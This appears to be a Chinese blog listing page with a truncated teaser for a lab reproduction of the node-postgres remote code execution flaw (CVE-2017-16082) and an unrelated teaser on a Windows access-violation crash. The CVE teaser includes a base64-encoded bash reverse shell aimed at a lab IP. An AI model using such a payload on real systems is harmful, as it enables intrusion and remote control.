俏皮小刺猬

文章
7
资源
0
加入时间
2年11月11天

node-postgres 代码执行漏洞(CVE-2017-16082)

漏洞原理请参考这篇文章:https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html漏洞复现我这里用的是vulhub的环境,启动环境后,访问http://your-ip:3000/?id=1即可查看到id为1的用户信息,当然id这里存在注入点,我们利用poc来RCE。比如我想执行命令echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyOC8

0x00007FFB506324BF (ucrtbased.dll)处(位于 Project6.exe 中)引发的异常: 0xC0000005: 读取位置 0x000000000000001F 时发生...

这是一个崩溃异常,指的是在执行程序时发生了访问冲突,导致程序崩溃。这通常是由于软件或硬件问题导致的。在这种情况下,异常是在 Project6.exe 中的 ucrtbased.dll 库的 0x00007FFB506324BF 位置引发的。异常代码 0xC0000005 表示发生了访问冲突,并且错误发生在读取位置 0x000000000000001F 时。要解决这个问题,你可能需要更新你的软件...